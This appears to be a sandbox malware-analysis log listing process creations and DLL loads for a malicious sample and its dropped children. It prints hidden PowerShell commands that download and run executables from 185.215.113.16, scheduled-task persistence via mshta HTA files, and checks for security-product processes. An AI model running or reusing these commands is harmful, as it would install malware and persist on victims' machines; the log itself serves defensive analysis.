Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 --field-trial-handle=2188,i,471670975520233966,4041854112257341000,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe "C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1071504021\am_no.cmd" "
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1071538001\f2d6093d56.exe "C:\Users\user\AppData\Local\Temp\1071538001\f2d6093d56.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1071539001\b33114b970.exe "C:\Users\user\AppData\Local\Temp\1071539001\b33114b970.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe "C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1071504021\am_no.cmd" "
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1071504021\am_no.cmd" "
Source: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn 8unbAmadbNN /tr "mshta C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn 8unbAmadbNN /tr "mshta C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE "C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE "C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1071504021\am_no.cmd" any_word
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "3d1I8ma3ZrJ" /tr "mshta \"C:\Temp\akcRBGtSi.hta\"" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\akcRBGtSi.hta"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn 4EyhLma4lxg /tr "mshta C:\Users\user\AppData\Local\Temp\ID499IQcV.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\ID499IQcV.hta
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn 4EyhLma4lxg /tr "mshta C:\Users\user\AppData\Local\Temp\ID499IQcV.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE "C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE "C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE"
Source: C:\Users\user\AppData\Local\Temp\1071538001\f2d6093d56.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1071504021\am_no.cmd" any_word
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "In6qPmaKHFs" /tr "mshta \"C:\Temp\sJKQarzEf.hta\"" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "C:\Temp\sJKQarzEf.hta"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Users\user\AppData\Local\Temp\1071539001\b33114b970.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	Process created: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe "C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe"
Source: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn QiaKqmadtXf /tr "mshta C:\Users\user\AppData\Local\Temp\xsqWpWDz2.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\xsqWpWDz2.hta
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn QiaKqmadtXf /tr "mshta C:\Users\user\AppData\Local\Temp\xsqWpWDz2.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\random.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: userenv.dll	Jump to behavior
